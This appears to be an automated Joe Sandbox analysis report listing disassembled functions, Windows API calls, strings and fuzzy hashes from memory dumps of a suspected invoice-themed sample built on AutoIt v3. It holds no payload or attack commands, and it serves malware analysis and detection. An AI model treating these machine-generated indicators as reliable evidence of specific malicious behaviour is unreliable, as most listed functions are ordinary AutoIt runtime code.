                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624
                                          Function 004225FA Relevance: .3, Instructions: 341COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624
                                          Function 00573594 Relevance: .1, Instructions: 134COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                          • Instruction ID: 7a836034ff4d483b0a5e627e7c6486f0e91a18695ad34818de9f4596da72514b
                                          • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                          • Instruction Fuzzy Hash: 99311C72D0A2947ACF338B1878086B57F64BB62774F1DC1A6E44D4B352D2219F44F651
                                          Function 00E9F280 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                          • Instruction ID: 105f36ce02a81bf0a868a31056c22b1e35d6c0f571fc4c7fc545565ed6b30e66
                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                          • Instruction Fuzzy Hash: 8C41D571D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D734AB41DB40
                                          Function 00E9F170 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                          • Instruction ID: 49a1be11d3fa798ca8406d4963708c746af4b9d39a6da376e6f5f5c34f49242f
                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                          • Instruction Fuzzy Hash: 3F019278A01109EFCB44DF99C5909AEF7F5FB48310F2085AAE909E7301D730AE51DB80
                                          Function 00E9F110 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                          • Instruction ID: d2905eb18557dec84a5c32edb135518c21d17e44c8d95005fa8e8e4b452c7e25
                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                          • Instruction Fuzzy Hash: 42018078A01109EFCB44DF99C5909AEF7B5FB48314F2085A9E819A7302D730AE51DB80
                                          Function 00E9DAB0 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                          Function 00477806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 0047785B
                                          • DeleteObject.GDI32(00000000), ref: 0047786D
                                          • DestroyWindow.USER32 ref: 0047787B
                                          • GetDesktopWindow.USER32 ref: 00477895
                                          • GetWindowRect.USER32(00000000), ref: 0047789C
                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004779DD
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004779ED
                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A35
                                          • GetClientRect.USER32(00000000,?), ref: 00477A41
                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00477A7B
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A9D
                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AB0
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477ABB
                                          • GlobalLock.KERNEL32(00000000), ref: 00477AC4
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AD3
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00477ADC
                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AE3
                                          • GlobalFree.KERNEL32(00000000), ref: 00477AEE
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B00
                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00492CAC,00000000), ref: 00477B16
                                          • GlobalFree.KERNEL32(00000000), ref: 00477B26
                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00477B4C
                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00477B6B
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B8D
                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477D7A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                          • String ID: $AutoIt v3$DISPLAY$static
                                          • API String ID: 2211948467-2373415609
                                          • Opcode ID: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
                                          • Instruction ID: 98d8c47751f1291c48596143d1a8e41d269c6aae9b6b01708d63eada7aa7ec2c
                                          • Opcode Fuzzy Hash: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
                                          • Instruction Fuzzy Hash: DE027A71900105EFDB14DFA4DC89EAE7BB9FF49310F10856AF905AB2A1C738AD41CB68
                                          Function 0048356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                                          • IsWindowVisible.USER32(?), ref: 0048364B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BuffCharUpperVisibleWindow
                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                          • API String ID: 4105515805-45149045
                                          • Opcode ID: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                          • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                                          • Opcode Fuzzy Hash: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                          • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
                                          Function 0048A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 0048A630
                                          • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                                          • GetSysColor.USER32(0000000F), ref: 0048A66D
                                          • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                                          • SelectObject.GDI32(?,00000000), ref: 0048A696
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                                          • GetSysColor.USER32(00000010), ref: 0048A6C9
                                          • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                                          • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                                          • DeleteObject.GDI32(00000000), ref: 0048A6E6
                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                                          • FillRect.USER32(?,?,00000000), ref: 0048A763
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                                            • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                                            • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                                            • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                            • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                                            • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                                            • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                            • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                                            • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                            • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                                            • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                            • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                            • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                            • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 3521893082-0
                                          • Opcode ID: e736afda7f8d8f4f81f1f5e827ea2c9cb71a52f7c0883247402ba6a9b2613b70
                                          • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                                          • Opcode Fuzzy Hash: e736afda7f8d8f4f81f1f5e827ea2c9cb71a52f7c0883247402ba6a9b2613b70
                                          • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                                          Function 00402C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                          • DeleteObject.GDI32(00000000), ref: 00402CE8
                                          • DeleteObject.GDI32(00000000), ref: 00402CF3
                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                                            • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                          • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 464785882-4108050209
                                          • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                          • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                                          • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                          • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                                          Function 004774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(00000000), ref: 004774DE
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                          • GetClientRect.USER32(00000000,?), ref: 0047763F
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                          • GetStockObject.GDI32(00000011), ref: 004776A2
                                          • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                          • DeleteDC.GDI32(00000000), ref: 004776C8
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                          • GetStockObject.GDI32(00000011), ref: 004777A6
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
                                          • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                                          • Opcode Fuzzy Hash: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
                                          • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                                          Function 0046AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                          • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                          • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: 7b77267de8c71d2cda51ee6c507caa4ba89c237b7189c85e33c2ab5589f655bd
                                          • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                                          • Opcode Fuzzy Hash: 7b77267de8c71d2cda51ee6c507caa4ba89c237b7189c85e33c2ab5589f655bd
                                          • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                                          Function 004068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 1038674560-86951937
                                          • Opcode ID: b60a2603ebee8ab87cd8b4daa0333528d2f723e6ec57a158cad0bc7f750be268
                                          • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                                          • Opcode Fuzzy Hash: b60a2603ebee8ab87cd8b4daa0333528d2f723e6ec57a158cad0bc7f750be268
                                          • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                                          Function 0048A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(00000012), ref: 0048A903
                                          • SetTextColor.GDI32(?,?), ref: 0048A907
                                          • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
